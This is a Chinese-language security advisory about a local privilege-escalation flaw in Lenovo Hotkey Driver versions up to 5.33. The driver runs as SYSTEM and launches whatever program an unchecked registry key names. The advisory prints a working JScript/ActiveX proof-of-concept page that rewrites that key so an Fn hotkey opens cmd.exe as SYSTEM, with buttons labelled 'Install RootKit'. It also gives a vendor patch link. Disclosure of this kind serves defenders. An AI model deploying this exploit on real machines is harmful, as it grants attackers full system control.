漏洞起因
设计错误
危险等级
中
影响系统
Lenovo Hotkey Driver <= v5.33
不受影响系统
危害
本地攻击者可以利用漏洞以SYSTEM权限执行任意命令。
攻击所需条件
攻击者必须访问联想笔记本电脑。
漏洞信息
Hotkey驱动是联想笔记本电脑中用于监控和执行特定Fn键操作的应用驱动。
Hotkey驱动默认以NT Authority\System特权以服务方式运行,当检测到热键时,Hotkey驱动会检查特定文件的注册表键值来启动和调用此文件,如当按下Fn + F5键组合时,Hotkey驱动会检查如下的注册表键值:
HKEY_LOCAL_MACHINE\SOFTWARE\IBM\TPHOTKEY\CLASS\01\05
然后启动指定的应用程序(默认为Tp/AcFnF5.exe)。
由于其安装配置缘故,Hotkey驱动在windows登录之前即可用。但在调用时没有检查要启动的注册表键值,并且操作系统没有对此值的变动进行任意检测,因此通过拥有部分注册表访问权限的攻击者可以将热键更改为任意应用程序,之后在按下热键时以System权限执行。
测试方法
<head>
<script language="javaScript" type="text/javascript">
myobject = new ActiveXObject("WScript.Shell")
function install()
{
uri="HKEY_LOCAL_MACHINE\\SOFTWARE\\IBM\\TPHOTKEY\\CLASS\\01\\05";
tag="\\"
var value="File";
var data="cmd.exe";
myobject.run("reg.exe"+" copy "+uri+" "+uri+"\\backup "+" /f ");
myobject.run("reg.exe"+" ADD "+uri+" /v "+value+" /d "+data+" /f ");
value="Parameters";
data="/T:74";
myobject.run("reg.exe"+" ADD "+uri+" /v "+value+" /d "+data+" /f ");
}
function remove()
{
uri="HKEY_LOCAL_MACHINE\\SOFTWARE\\IBM\\TPHOTKEY\\CLASS\\01\\05";
myobject.run("reg.exe"+" copy "+uri+"\\backup "+uri+" /f ");
}
</script>
</head><body>
<h1>Lenovo Access Connection Exploite POC<h1>
<button onclick="install()">Install RootKit</button><P><button onclick="remove()">Remove RootKit</button>
</body></html>
厂商解决方案
用户可参考如下供应商提供的安全公告获得补丁信息:
http://www-307.ibm.com/pc/support/site.wss/MIGR-74261.html
漏洞提供者
Chilik Tamir
0 条评论。